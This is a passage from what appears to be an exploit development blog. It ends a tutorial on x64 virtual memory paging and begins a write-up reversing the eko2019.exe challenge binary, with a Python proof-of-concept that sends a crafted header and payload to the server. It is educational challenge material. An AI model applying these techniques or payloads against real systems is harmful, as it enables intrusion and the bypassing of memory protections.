  3. Page-Directory Table (PDT) (Bits 29-21)
  4. Page Table (PT) (Bits 20-12)

Each 9-bit field of a virtual address (47-39, 38-30, 29-21, 20-12) is actually just an index into one of the paging structure tables. The remaining 12 bits (11-0) are not an index, but an offset into the final physical page.

In addition, each paging structure table contains 512 page table entries (PxE), since a 9-bit index can select one of 2^9 = 512 entries.

For each physical memory page the MMU wants to attribute to a virtual memory page, the MMU will access an entry from each table (a page table entry) that will “lead us” to the next paging structure in line. This process will go on, until a final 4 KB physical page (more on this later) is retrieved.

Think of it as needing to pick a specific entry from each table to reach our final 4 KB physical memory page. We will get into some very high level mathematical computations on how this is done later, and seeing the exact anatomy of a virtual address in WinDbg.
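To make the bit ranges above concrete, here is a minimal sketch that pulls the four table indexes and the page offset out of a virtual address with shifts and masks. The function name split_virtual_address and the dictionary keys are hypothetical, and the example address is the 0xFFFFFFFF11223344 used in the introduction of this post.

```python
def split_virtual_address(va):
    """Return the four 9-bit table indexes and the 12-bit page offset."""
    return {
        "pml4_index": (va >> 39) & 0x1FF,   # bits 47-39
        "pdpt_index": (va >> 30) & 0x1FF,   # bits 38-30
        "pdt_index": (va >> 21) & 0x1FF,    # bits 29-21
        "pt_index": (va >> 12) & 0x1FF,     # bits 20-12
        "offset": va & 0xFFF,               # bits 11-0
    }

parts = split_virtual_address(0xFFFFFFFF11223344)

for name in ("pml4_index", "pdpt_index", "pdt_index", "pt_index", "offset"):
    print("{:<11} = 0x{:x}".format(name, parts[name]))
```

Each index is masked with 0x1FF (nine 1 bits), which is why no index can ever exceed 511.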

Now that we have some high level understanding of the various paging structures, and before diving into the paging structures and the CR3 register (PML4, I am looking at you) - let’s circle back to bits 63-48, which are represented as “Sign Extend”.

Canonical Addressing

In a 64-bit architecture, each virtual memory address has a total of 8 bytes, compared to a 4 byte x86 virtual memory address.

Referring back to the above section, we can recall that bits 63-48 are not accessing any paging structures. What is the purpose of this? It has to do with the limitations of the MMU.

Technically, a 64-bit system only uses 48 bits of each virtual address. This is because if a 64-bit system allowed all 64 bits to be addressed, the system would need to be able to address 16 exabytes of total virtual memory. 1 exabyte is equivalent to roughly 1,000,000 terabytes (TB). Firstly, the MMU would not be able to efficiently keep track of all of this from a translation perspective. Secondly (and most importantly), systems today cannot support this much virtual memory.

The CPU implements a “governor” of sorts, which limits 64-bit addresses to 48-bit addresses. An address in which bits 63-48 are a sign extension of bit 47 is known as a canonical address.

Sign extending bits 63-48 limits the virtual address space to 256 TB of virtual memory. This is still a lot, but it is still feasible.
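The two sizes mentioned above fall straight out of powers of two. Here is a short sketch of the arithmetic, using binary units (TiB and EiB), which is an assumption on my part about how the figures are being counted.

```python
TIB = 2 ** 40   # one tebibyte, in bytes
EIB = 2 ** 60   # one exbibyte, in bytes

full_64_bit_space = 2 ** 64        # every bit of the address usable
canonical_48_bit_space = 2 ** 48   # only bits 47-0 usable

print("64-bit space: {} EiB".format(full_64_bit_space // EIB))
print("48-bit space: {} TiB".format(canonical_48_bit_space // TIB))
```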

Let’s take a look to see how this all breaks down.

Referencing the Intel manual again, sign extending occurs in the following manner. Bit 47 is responsible for what bits 63-48 will be set to.

If bit 47 is set to 0, bits 63-48 will also be set to 0. If bit 47 is set to 1, bits 63-48 will be set to 1 (resulting in hexadecimal F’s in the virtual address).

The below chart, from Intel shows what addresses are valid and what addresses are invalid, in accordance with canonical addressing and sign extending. Note that we are only interested in the 48-bit addressing chart. 56-bit addressing refers to level 5 paging and 64-bit addressing refers to using the whole 64-bit address space.

Let’s look at two examples below.

The first example is the address KERNELBASE!VirtualProtect which has a virtual memory address of 00007ffce032cfc0. Breaking the address down into binary, we can see bit 47 is set to 0. Subsequently, bits 63-48 are also set to 0.

Generally, user mode addresses are going to be sign extended with a 0.

Taking a look at a kernel mode address, nt!MiGetPteAddress, we can see in this case bit 47 is set to 1. Meaning bits 63-48 are also set to 1, resulting in all hexadecimal F’s occurring in the virtual address as seen below.
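The rule from the two examples above can be sketched in a few lines. The helper names is_canonical and sign_extend_48 are hypothetical, and this only models 48-bit addressing (level 4 paging), not the other charts mentioned earlier.

```python
def is_canonical(va):
    """True if bits 63-48 are all copies of bit 47."""
    upper = va >> 47                 # bits 63-47, 17 bits in total
    return upper == 0 or upper == 0x1FFFF

def sign_extend_48(va48):
    """Extend a 48-bit address to 64 bits by copying bit 47 upward."""
    va48 &= (1 << 48) - 1
    if va48 & (1 << 47):
        return va48 | 0xFFFF000000000000
    return va48

# KERNELBASE!VirtualProtect address from this post (bit 47 is 0)
print(is_canonical(0x00007FFCE032CFC0))
# Bit 47 is 1 but bits 63-48 are 0, so this one is not canonical
print(is_canonical(0x0000800000000000))
# Sign extending the same 48 bits yields the canonical form
print("{:016x}".format(sign_extend_48(0x800000000000)))
```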

Now that we see how addressing is limited, let’s get into the breakdown of a virtual address.

(Question to you, the reader. Now that we know 64-bit systems only utilize 48 bits, do you see a clear need for 128-bit processors in the near future?)

The Anatomy of a Virtual Address (In All of Its Glory)

Let’s talk about paging structures and page table entries once again before we get into breaking down a virtual address.

Recall there are 4 main paging structures:

  1. Page-Map Level-4 Table (PML4)
  2. Page-Directory-Pointer Table (PDPT)
  3. Page-Directory Table (PDT)
  4. Page Table (PT)

As a point of clarification, a page table entry for each of these structures removes the “T” from the acronym and replaces it with an “E”. For instance, an entry from the PDT is known as a PDE. An entry from the PT is known as a PTE and so on.

Recall that each one of these structures is a table that has 512 entries each. One PML4E can address up to 512 GB of memory. One PDPE can address 1 GB. One PDE can address 2 MB. Finally, one PTE can map 4 KB, or a physical memory page.

Note that the actual size of each entry is 8 bytes (the size of a virtual memory address in a 64-bit architecture).
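The sizes above all fall out of the same multiplication: every table has 512 entries, and each level covers 512 times what the level below it covers. Here is a small Python 3 sketch of that arithmetic (the variable names are my own, purely for illustration).

```python
ENTRIES_PER_TABLE = 512
PAGE_SIZE = 4 * 1024    # one PTE maps a single 4 KB page

pte_span = PAGE_SIZE
pde_span = ENTRIES_PER_TABLE * pte_span       # one PDE covers a full page table
pdpe_span = ENTRIES_PER_TABLE * pde_span      # one PDPE covers a full PDT
pml4e_span = ENTRIES_PER_TABLE * pdpe_span    # one PML4E covers a full PDPT
total_span = ENTRIES_PER_TABLE * pml4e_span   # the whole PML4

for name, span in [("PTE", pte_span), ("PDE", pde_span),
                   ("PDPE", pdpe_span), ("PML4E", pml4e_span),
                   ("Entire PML4", total_span)]:
    print(f"{name}: {span:#x} bytes")
```

The last value works out to 2^48 bytes, which is the same 256 TB limit that 48-bit canonical addressing gave us earlier.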

Let’s talk about the PML4 table briefly, which cannot be talked about without mentioning the CR3 register.

The CR3 register actually contains a physical memory address, which serves as the PML4 table base. This can be seen in the image below, where CR3 holds an actual physical memory address.

This is how the paging process begins, as the PML4 can be fetched from the CR3 register.

Again, to reiterate, an entry fetched from the PML4 (whose base comes from the CR3 register) points to the base of a PDPT. An entry fetched from the PDPT points to the base of a PDT. An entry fetched from the PDT points to the base of a PT, and an entry fetched from the PT points to a 4 KB physical memory page.

Before moving on, there is one special thing to note, and that is the actual page table (PT).

Once the page table (PT) has been indexed with bits 20-12, bits 11-0 no longer need to fetch an index from any other paging structures. Bits 11-0 actually serve as an offset into a physical memory page 4 KB in size. Recall that an offset is the distance between two places (generally from a base, the start of the physical page in this case, to another location). Bits 11-0 simply serve as the distance from the base of the physical page, which the PTE refers to, to the actual location of the data in physical memory. We will see this outlined very shortly when we perform a page translation in WinDbg.
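To make the bit ranges concrete, here is a minimal Python 3 sketch that splits a 48-bit virtual address into its four 9-bit table indexes and its 12-bit page offset. The function name `split_virtual_address` is hypothetical, and the address used is the KERNELBASE!VirtualProtect address from earlier in this post.

```python
def split_virtual_address(va):
    """Split a virtual address into paging structure indexes (4-level paging)."""
    return {
        "pml4_index": (va >> 39) & 0x1ff,   # bits 47-39
        "pdpt_index": (va >> 30) & 0x1ff,   # bits 38-30
        "pd_index": (va >> 21) & 0x1ff,     # bits 29-21
        "pt_index": (va >> 12) & 0x1ff,     # bits 20-12
        "page_offset": va & 0xfff,          # bits 11-0
    }

parts = split_virtual_address(0x00007ffce032cfc0)
for name, value in parts.items():
    print(f"{name}: {value:#x}")
```

Each index is 9 bits wide because each table holds 512 (2^9) entries, and the offset is 12 bits wide because a page is 4 KB (2^12 bytes).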

Now that we understand at a bit of a lower level how each paging structure is indexed, let’s take it an even lower level.

Finally, an Example!

VirtualAlloc() is a routine in Windows that creates a region of virtual memory and returns a pointer to this virtual memory.

In our example, the virtual memory address 510000 is a virtual memory address that was created by KERNELBASE!VirtualAlloc. Let’s run the !pte command in WinDbg to see what we are working with here.

One thing to note before moving on, WinDbg references a few paging structures and entries a bit differently. Namely, they are:

  1. PXE = PML4E
  2. PPE = PDPE

Moving on, we can see each structure’s entries can all be found at their respective virtual addresses, shown above as:

  1. PML4E at FFFFF6FB7DBED000
  2. PDPE at FFFFF6FB7DA00000
  3. PDE at FFFFF6FB40000010
  4. PTE at FFFFF68000002880

This is because the !pte output converts the entries to virtual addresses before being displayed. We don’t care so much about the virtual addresses (for the time being) because we are trying to see how virtual addresses are converted into physical addresses.
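For the curious, the virtual addresses in the list above can be reproduced with some simple math. The Python 3 sketch below is an illustration only: the four base constants are assumptions, taken to be the values implied by the !pte output above, and they are not guaranteed to be the same on every Windows build. The function name `entry_addresses` is also made up.

```python
# Assumed base virtual addresses of each paging structure's entries,
# inferred from the !pte output above (not universal constants)
PTE_BASE = 0xFFFFF68000000000
PDE_BASE = 0xFFFFF6FB40000000
PPE_BASE = 0xFFFFF6FB7DA00000
PXE_BASE = 0xFFFFF6FB7DBED000

def entry_addresses(va):
    """Virtual address of each entry that maps va (each entry is 8 bytes)."""
    va &= (1 << 48) - 1   # only the low 48 bits take part in translation
    return {
        "PXE": PXE_BASE + ((va >> 39) << 3),
        "PPE": PPE_BASE + ((va >> 30) << 3),
        "PDE": PDE_BASE + ((va >> 21) << 3),
        "PTE": PTE_BASE + ((va >> 12) << 3),
    }

for name, addr in entry_addresses(0x510000).items():
    print(f"{name} at {addr:016X}")
```

Under these assumptions, the output for 510000 lines up with the four addresses WinDbg displayed.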

In order to reach our goal, right now we only care about the pfn, which we can see from the !pte output. Let’s first understand what the pfn means, as this will help us understand the output of !pte and how to fetch the physical page associated with a virtual page.

A PFN, or page frame number, refers to the next paging structure in the hierarchy. PFNs work with PTEs, in that PTEs fetch the PFN for the next paging structure. That PFN is then multiplied by 0x1000 (4 KB) to retrieve the physical address of the next paging structure. We will hit more on this now.

In the output of !pte we see there is a PML4E. A PML4E, as we know, will fetch the base address of the PDPT table. From there, an entry is indexed from that table, known as a PDPE.

As we can see from the WinDbg output in the earlier screenshot, the PFN that the PML4E is using to reference the PDPT table is 7bbc8. This means this should be the page frame number for the PDPT, as we know a page frame number refers to the next paging structure in the hierarchy.

We will now use !vtop to convert the virtual address of the PDPT to a physical address, to verify that the PML4E is referencing the correct paging structure.

Let’s break down this command first.

The 7be59000 value in the above command is the base paging structure in the CR3 register, the PML4 physical address. When using !vtop, you use this address to specify the base paging structure. After that, we have the virtual address we want to convert.

As we can see, the PDPT is located at a physical address of 7bbc8000! This is perfect, because this is the PFN value used by the PML4 structure to index the next paging structure, PDPT. Recall earlier, that we multiply the PFN (7bbc8 in this case) by 0x1000, which gives us a physical memory address of 7bbc8000 - which represents the PDPT.

Let’s verify in WinDbg with !dd, which will dump physical memory, that the virtual address of the PDPE and the physical address both contain the same data.

As we can see, the physical and virtual memory addresses contain the same values.

Too Many Acronyms!

This is an ideal example to show that a physical page of memory is actually NOTHING MORE than a PFN multiplied by 0x1000 and an offset to the physical memory page! A PFN, as we can recall, is a reference to the base of the next paging structure.

Since we converted the PDPT address (which is a base address to begin with), there was no offset in the physical translation, meaning that the PFN was appended with 0’s.

This is mainly because we were fetching the base address of a paging structure, which means it won’t be offset from anything.

If our virtual address would have been FFFFF6FB7DA00008, for instance, our physical address would have been 7bbc8008. This is because the address is at an offset of 0x8 from the base of the PFN!
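The relationship between a PFN, an offset, and a physical address is small enough to sketch in a few lines of Python 3. The helper name `physical_address` is my own, and the values are the ones from the translation we just walked through.

```python
PAGE_SHIFT = 12   # 4 KB pages, so a PFN is shifted left by 12 bits (multiplied by 0x1000)

def physical_address(pfn, offset=0):
    """Combine a page frame number with an offset into that page."""
    if not 0 <= offset < (1 << PAGE_SHIFT):
        raise ValueError("offset must fit inside a 4 KB page")
    return (pfn << PAGE_SHIFT) | offset

print(hex(physical_address(0x7bbc8)))        # base of the PDPT
print(hex(physical_address(0x7bbc8, 0x8)))   # 0x8 bytes past the base
```

Shifting left by 12 bits is the same thing as multiplying by 0x1000, which is why the PFN simply appears with three extra hexadecimal digits appended.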

Awesome, we now know what a physical memory address looks like at a high level. But each entry in a paging structure (a PTE) contains more metadata. What does this metadata look like and how is it useful?

PTEs - For Real This Time

Let’s take a look back at an image that was already displayed, in the !pte output.

More specifically, let’s take a look at the PTE entry, furthest to the right.

PTE at FFFFF68000002880
contains 7A9000007BBA9867
pfn 7bba9     ---DA--UWEV

Let’s take a look at the entry, more specifically the contains line which contains 7A9000007BBA9867.

We can clearly see the PFN here, in between the 7A900000 and 867. But what do these other numbers mean? Additionally, what does ---DA--UWEV mean? These refer to “control bits”, which provision various permissions, features, etc to the memory page. Let’s take a look at each of these bits.

Here is a list of some of the possible control bits. These bits are the ones we care about, and it is not an exhaustive list.

  1. P - The PTE is valid if this bit is set
  2. R/W - Writing is enabled if this bit is set
  3. U/S - If this bit is set, the page is a user mode page. If this bit is clear, the page is a supervisor (kernel) mode page
  4. D - If this bit is set, a write has been made to this page, making it a “dirty” page
  5. A - If this bit is set, this memory page has been referenced at some point
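To tie the control bits back to the raw value, here is a minimal Python 3 sketch that decodes the PTE from the !pte output (7A9000007BBA9867). The bit positions follow the standard x64 layout for a 4 KB page table entry (P is bit 0, R/W is bit 1, U/S is bit 2, A is bit 5, D is bit 6). Treating the PFN as bits 47-12 is an assumption that fits this example, and the function name `decode_pte` is hypothetical.

```python
def decode_pte(pte):
    """Pull the PFN and a few control bits out of a raw 64-bit PTE value."""
    return {
        "valid": bool(pte & (1 << 0)),      # P
        "writable": bool(pte & (1 << 1)),   # R/W
        "user": bool(pte & (1 << 2)),       # U/S
        "accessed": bool(pte & (1 << 5)),   # A
        "dirty": bool(pte & (1 << 6)),      # D
        "pfn": (pte >> 12) & ((1 << 36) - 1),   # assumed to be bits 47-12
    }

decoded = decode_pte(0x7A9000007BBA9867)
for name, value in decoded.items():
    print(name, hex(value) if name == "pfn" else value)
```

The low 12 bits of this entry are 0x867, and every one of the five bits listed above is set, which matches the D, A, U, W, and V flags WinDbg printed.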

Mouth Of The River

Again, this was by no means meant to be an exhaustive and comprehensive “tell all” of memory paging. This article barely scratched the surface. However, understanding things like control bits and virtual memory and having that as prerequisite knowledge allows you to understand bypassing mitigations such as NX in kernel pool memory, or more ways of bypassing SMEP. The next post will go into bypassing SMEP and NX in the kernel by way of the prerequisite knowledge laid out here.

You know the drill, any comments, questions, corrections, feel free to reach out to me. Until then!

Peace, love, and positivity! :-)

Exploit Development: Rippity ROPpity The Stack Is Our Property - Blue Frost Security eko2019.exe Full ASLR and DEP Bypass on Windows 10 x64

27 March 2020 at 00:00

Introduction

I have spent the last few days working on obtaining some more experience with reverse engineering to complement my exploit development background. During this time, I stumbled across this challenge put on by Blue Frost Security earlier in the year- which requires both reverse engineering and exploit development skills. Although I would by no means consider myself an expert in reverse engineering, I decided this would be a nice way to try to become more well versed with the entire development lifecycle, starting with identifying vulnerabilities through reverse engineering to developing a functioning exploit.

Before we begin, I will be using Ghidra and IDA Freeware 64-bit to reverse the eko2019.exe application. In addition, I’ll be using WinDbg to develop the exploit. I prefer to use IDA to view the execution of a program- but I prefer to use the Ghidra decompiler to view the code that the program is comprised of. In addition to the aforementioned information, this exploit will be developed on Windows 10 x64 RS2, due to the fact that I already had a VM with this OS ready to go. This exploit will work up to Windows 10 x64 RS6 (1903 build), although the offsets between addresses will differ.

Reverse, Reverse!

Starting the application, we can clearly see the server has echoed some text into the command prompt where the server is running.

After some investigation, it seems this application binds to port 54321. Looking at the text in the command prompt window leads me to believe printf(), or similar functions, must have been called in order for the application to display this text. I am also inclined to believe that these print functions must be located somewhere around the routine that is responsible for opening up a socket on port 54321 and accepting messages. Let’s crack open eko2019.exe in IDA and see if our hypothesis is correct.

By opening the Strings subview in IDA, we can identify all of the strings within eko2019.exe.

As we can see from the above image, we have identified a string that seems like a good place to start! "[+] Message received: %i bytes\n" is indicative that the server has received a connection and message from the client (us). The function/code that is responsible for incoming connections may be around where this string is located. By double-clicking on .data:000000014000C0A8 (the address of this string), we can get a better look at the internals of the eko2019.exe application, as shown below.

Perfect! We have identified where the string "[+] Message received: %i bytes\n" resides. In IDA, we have the ability to cross reference where a function, routine, instruction, etc. resides. This functionality is outlined by DATA XREF: sub_1400011E0+11E↑o comment, which is a cross reference of data in this case, in the above image. If we double click on sub_1400011E0+11E↑o in the DATA XREF comment, we will land on the function in which the "[+] Message received: %i bytes\n" string resides.

Nice! As we can see from the above image, the place in which this string resides, is location (loc) loc_1400012CA. If we trace execution back to where it originated, we can see that the function we are inside is sub_1400011E0 (eko2019.exe+0x11e0).

After looking around this function for a while, it is evident this is the function that handles connections and messages! Knowing this, let’s head over to Ghidra and decompile this function to see what is going on.

Opening the function in Ghidra’s decompiler, a few things stand out to us, as outlined in the image below.

Number one, the local_258 variable is initialized with the recv() function. Using this function, eko2019.exe will “read in” the data sent from the client. The recv() function makes the function call with the following arguments:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function.
  • A pointer to where the buffer that was received will be written to (local_28).
  • The specified length which local_28 should be (0x10 hexadecimal bytes/16 decimal bytes).
  • Zero, which represents what flags should be implemented (none in this case).

What this means, is that the size of the request received by the recv() function will be stored in the variable local_258.

This is how the call looks, disassembled, within IDA.

The next line of code after the value of local_258 is set, makes a call to printf() which displays a message indicating the “header” has been received, and prints the value of local_258.

printf(s__[+]_Header_received:_%i_bytes_14000c008,(ulonglong)local_258)

We can interpret this behavior to mean that eko2019.exe accepts a header before the “message” portion of the client request is received. This header must be 0x10 hexadecimal bytes (16 decimal bytes) in length. This is the first “check” the application makes on our request, thus being the first “check” we must bypass.

Number two, after the header is received by the program, the specific variable that contains the pointer to the buffer received by the previous recv() request (local_28) is compared to the string constant 0x393130326f6b45, or Eko2019 in text form, in an if statement.

if (local_28 == 0x393130326f6b45) {

Taking a look at the data type of local_28, declared at the beginning of this function, we notice it is a longlong. This means that the variable should be 8 bytes in totality. We notice, however, that 0x393130326f6b45 is only 7 bytes in length. This behavior is indicative that the string Eko2019 should be null terminated. The null character will provide the last byte needed for our purposes.
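We can double check the relationship between the constant and the string with Python's struct module. This is a quick Python 3 sketch, with variable names of my own choosing, that packs the constant as a little-endian 8 byte integer (x64 is little-endian) and looks at the resulting bytes.

```python
import struct

MAGIC = 0x393130326f6b45   # the constant local_28 is compared against

# "<Q" packs an unsigned 8 byte integer in little-endian byte order
magic_bytes = struct.pack("<Q", MAGIC)

print(magic_bytes)
print(len(magic_bytes))
```

The 7 byte constant is padded out to 8 bytes with a zero as the most significant byte, which ends up last in memory. That trailing zero is the null terminator.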

This is how this check is executed, in IDA.

Number three, the value of the variable local_20 is compared to 0x201 (513 decimal).

if (local_20 < 0x201) {

Where does this variable come from you ask? If we take a look two lines down, we can see that local_20 is used in another recv() call, as the length of the buffer that stores the request.

local_258 = recv(param_1,local_238,(uint)(ushort)local_20,0);

The recv() call here again uses the same type of arguments as the previous call and reuses the variable local_258. Let’s take a look at the declaration of the variable local_238 in the above recv() function call, as it hasn’t been referenced in this blog post yet.

char local_238 [512];

This allocates a buffer of 512 bytes. Looking at the above recv() call, here is how the arguments are lined up:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function is used again.
  • A pointer to where the buffer that was received will be written to (local_238 this time, which is 512 bytes).
  • The specified length, which is represented by local_20. This variable was used in the check implemented above, which looks to see if the size of the data received in the buffer is 512 bytes or less.
  • Zero, which represents what flags should be implemented (none in this case).

The last check looks to see if our message is sent in a multiple of 8 (aka aligned properly with a full 8 byte address). This check can be identified with relative ease.

uVar2 = (int)local_258 >> 0x1f & 7;
if ((local_258 + uVar2 & 7) == uVar2) {
          iVar1 = printf(s__[+]_Remote_message_(%i):_'%s'_14000c0f8,(ulonglong)DAT_14000c000, local_238);

The size of local_258, which at this point is the size of our message (not the header), is shifted to the right, via the bitwise operator >>. This value is then bitwise AND’d with 7 decimal. This is what the result would look like if our message size was 0x200 bytes (512 decimal), which is a known multiple of 8.

This value gets stored in the uVar2 variable, which would now have a value of 0, based on the above photo.

If we would like our message to go through, it seems as though we are going to need to satisfy the above if statement. The if statement adds the value of local_258 (presumably 0x200 in this example) to the value of uVar2, while using bitwise AND on the result of the addition with 7 decimal. If the total result is equal to uVar2, which is 0, the message is sent!

As we can see, the statement (local_258 + uVar2 & 7) == uVar2 is indeed true, meaning we can send our message!

Let’s try another scenario with a value that is not a multiple of 8, like 0x199.

Using the same formula above, with the bitwise shift right operator, we yield a value of 0.

Taking this value of 0, adding it to 0x199 and using bitwise AND on the result- yields a nonzero value (1).

This means the if statement would have failed, and our message would not have gone through (since 0x199 is not a multiple of 8)!
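The two scenarios above can be replayed outside of the debugger. Below is a minimal Python 3 sketch of the decompiled check. The function names are hypothetical, and `to_int32` is only there to mimic the (int) cast from the Ghidra output, since Python integers are not fixed width.

```python
def to_int32(value):
    """Reinterpret the low 32 bits of value as a signed 32-bit integer."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value

def passes_alignment_check(received):
    """Mirror of: uVar2 = (int)local_258 >> 0x1f & 7;
                  if ((local_258 + uVar2 & 7) == uVar2)"""
    n = to_int32(received)
    u_var2 = (n >> 0x1f) & 7              # 0 for any non-negative size
    return ((n + u_var2) & 7) == u_var2   # + binds tighter than &, as in C

print(passes_alignment_check(0x200))   # multiple of 8
print(passes_alignment_check(0x199))   # not a multiple of 8
```

For any non-negative size, uVar2 is 0, so the whole check boils down to whether the low three bits of the size are clear.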

In total, here are the checks we must bypass to send our buffer:

  1. A 16 byte header (0x10 hexadecimal) with the string 0x393130326f6b45, which is null terminated, as the first 8 bytes (remember, the first 16 bytes of the request are interpreted as the header. This means we need 8 additional bytes appended to the null terminated string).
  2. Our message (not counting the header) must be 512 bytes (0x200 hexadecimal bytes) or less
  3. Our message’s length must be a multiple of 8 (the size of an x64 memory address)

Now that we have the ability to bypass the checks eko2019.exe makes on our buffer (which is comprised of the header and message), we can successfully interact with the server! The only question remains- where exactly does this buffer end up when it is received by the program? Will we even be able to locate this buffer? Is this only a partial write? Let’s take a look at the following snippet of code to find out.

local_250[0] = FUNC_140001170
hProcess = GetCurrentProcess();
WriteProcessMemory(hProcess,FUN_140001000,local_250,8,&local_260);

The Windows API function GetCurrentProcess() first returns a handle to the current process (eko2019.exe). This handle is passed to a call to WriteProcessMemory(), which writes data to an area of memory in a specified process.

According to Microsoft Docs (formerly known as MSDN), a call to WriteProcessMemory() is defined as such.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);

  • hProcess in this case will be set to the current process (eko2019.exe).
  • lpBaseAddress is set to the function inside of eko2019.exe, sub_140001000 (eko2019.exe+0x1000). This will be where WriteProcessMemory() starts writing memory to.
  • lpBuffer is where the memory written to lpBaseAddress will be taken from. In our case, the buffer will be taken from function sub_140001170 (eko2019.exe+0x1170), which is represented by the variable local_250.
  • nSize is statically assigned a value of 8, meaning this function call will write one QWORD.
  • *lpNumberOfBytesWritten is a pointer to a variable that will receive the number of bytes written.

Now that we have a better idea of what will be written where, let’s see how this all looks in IDA.

There is something very interesting going on in the above image. Let’s start with the following instructions.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If you can recall from the WriteProcessMemory() arguments, the buffer in which WriteProcessMemory() will write from, is actually from the function sub_140001170, which is eko2019.exe+0x1170 (via the local_250 variable). From the above assembly code, we can see how and where this function is utilized!

Looking at the assembly code, it seems as though the address of the unknown data, unk_14000E520, is placed into the RCX register. The QWORD located at that address plus RAX * 8 (in other words, the data at this location with the value of RAX factored in as an index) is then loaded into RCX. RCX is then passed as a function parameter (due to the x64 __fastcall calling convention) to function sub_140001170 (eko2019.exe+0x1170).

This function, sub_140001170 (eko2019.exe+0x1170), will then return its value. The returned value of this function is going to be what is written to memory, via the WriteProcessMemory() function call.

We can recall from the WriteProcessMemory() function arguments earlier, that the location to which sub_140001170 will be written to, is sub_140001000 (eko2019.exe+0x1000). What is most interesting, is that this location is actually called directly after!

call sub_140001000

Let’s see what sub_140001000 looks like in IDA.

Essentially, when sub_140001000 (eko2019.exe+0x1000) is called after the WriteProcessMemory() routine, it will land on and execute whatever value the sub_140001170 (eko2019.exe+0x1170) function returns, along with some NOPS and a return.

Can we leverage this functionality? Let’s find out!

Stepping Stones

Now that we know what will be written to where, let’s set a breakpoint on this location in memory in WinDbg, and start stepping through each instruction and dumping the contents of the registers in use. This will give us a clearer understanding of the behavior of eko2019.exe

Here is the proof of concept we will be using, based on the checks we have bypassed earlier.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)
s.recv(1024)
s.close()

Before sending this proof of concept, let’s make sure a breakpoint is set at eko2019.exe+0x1330 (sub_140001330), as this is where we should land after our header is sent.

After sending our proof of concept, we can see we hit our breakpoint.

In addition to execution pausing, it seems as though we also control 0x1f8 bytes on the stack (504 decimal).

Let’s keep stepping through instructions, to see where we get!

After stepping through a few instructions, execution lands at this instruction, shown below.

lea rcx,[eko2019+0xe520 (00007ff6`6641e520)]

This instruction loads the address of eko2019.exe+0xe520 into RCX. Looking back, we recall the following is the disassembly from IDA that corresponds to our current instruction.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If we examine what is located at eko2019.exe+0xe520, we come across some interesting data, shown below.

It seems as though this value, 00488b01c3c3c3c3, will be loaded into RCX. This is very interesting, as we know that c3 bytes are that of a “return” instruction. What is of even more interest, is the first byte is set to zero. Since we know RAX is going to be tacked on to this value, it seems as though whatever is in RAX is going to complete this string! Let’s step through the instruction that does this.

RAX is currently set to 0x3e

The following instruction is executed, as shown below.

mov rcx, [rcx+rax*8]

RCX now contains the QWORD that was read from RCX + RAX * 8, and the byte that was previously zero now reflects the value from RAX!

Nice! This value is now going to be passed to the sub_140001170 (eko2019.exe+0x1170) function.

As we know, most of the time a function executes- the value it returns is placed in the accumulator register (RAX in this case). Take a look at the image below, which shows what value the sub_140001170 (eko2019.exe+0x1170) function returns.

Interesting! It seems as though the call to sub_140001170 (eko2019.exe+0x1170) inverted our bytes!

Based off of the research we have done previously, it is evident that this is the QWORD that is going to be written to sub_140001000 via the WriteProcessMemory() routine!
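Here is a rough Python 3 sketch of what we just watched happen. One assumption is baked in: the value passed to sub_140001170 is taken to be the data we saw at eko2019.exe+0xe520 with the zero byte replaced by the value from RAX (0x3e), and `swap_qword` is just my stand-in name for the byte inversion the function appeared to perform.

```python
import struct

def swap_qword(value):
    """Reverse the byte order of a 64-bit value."""
    return struct.unpack("<Q", struct.pack(">Q", value))[0]

table_value = 0x00488b01c3c3c3c3   # data seen at eko2019.exe+0xe520
rax = 0x3e                         # value of RAX at the time

# Assumption: the byte from RAX fills in the leading zero byte
rcx = (rax << 56) | table_value

returned = swap_qword(rcx)              # what the function hands back
written = struct.pack("<Q", returned)   # how that QWORD sits in memory

print(hex(rcx))
print(hex(returned))
print(written.hex())
```

Since x64 is little-endian, the byte order in memory ends up being the prefix byte first, followed by 48 8b 01 and four c3 bytes. That is the byte sequence that will sit at sub_140001000 once WriteProcessMemory() is done.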

As we can see below, the next item up for execution (that is of importance) is the GetCurrentProcess() routine, which will return a handle to the current process (eko2019.exe) into RAX, similarly to how the last function returned its value into RAX.

Taking a look into RAX, we can see a value of ffffffffffffffff. This represents the current process! For instance, if we wanted to call WriteProcessMemory() outside of a debugger in the C programming language for example, specifying the first function argument as ffffffffffffffff would represent the current process- without even needing to obtain a handle to the current process! This is because technically GetCurrentProcess() returns a “pseudo handle” to the current process. A pseudo handle is a special constant of (HANDLE)-1, or ffffffffffffffff.

All that is left now, is to step through up until the call to WriteProcessMemory() to verify everything will write as expected.

Now that WriteProcessMemory() is about to be called- let’s take a look at the arguments that will be used in the function call.

The fifth argument is located at RSP + 0x20. This is where the __fastcall calling convention places arguments after the first four, which are passed in RCX, RDX, R8, and R9. Each argument from the 5th onward is placed on the stack, starting at RSP + 0x20, with each subsequent argument 8 bytes after the last (e.g. RSP + 0x28, RSP + 0x30, etc. Remember, we are doing hexadecimal math here!).
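As a quick reference, the mapping from argument position to location can be sketched in Python 3 as below. This only covers integer and pointer arguments as seen at the moment of the call instruction, and the helper name `argument_location` is made up for illustration.

```python
REGISTER_ARGS = ["RCX", "RDX", "R8", "R9"]

def argument_location(position):
    """Where the Nth (1-based) integer/pointer argument lives at the call."""
    if position < 1:
        raise ValueError("argument positions start at 1")
    if position <= 4:
        return REGISTER_ARGS[position - 1]
    # The 5th argument sits at RSP + 0x20, and each one after is 8 bytes later
    return "RSP + {0:#x}".format(0x20 + 8 * (position - 5))

# WriteProcessMemory() takes five arguments
names = ["hProcess", "lpBaseAddress", "lpBuffer", "nSize", "lpNumberOfBytesWritten"]
for position, name in enumerate(names, start=1):
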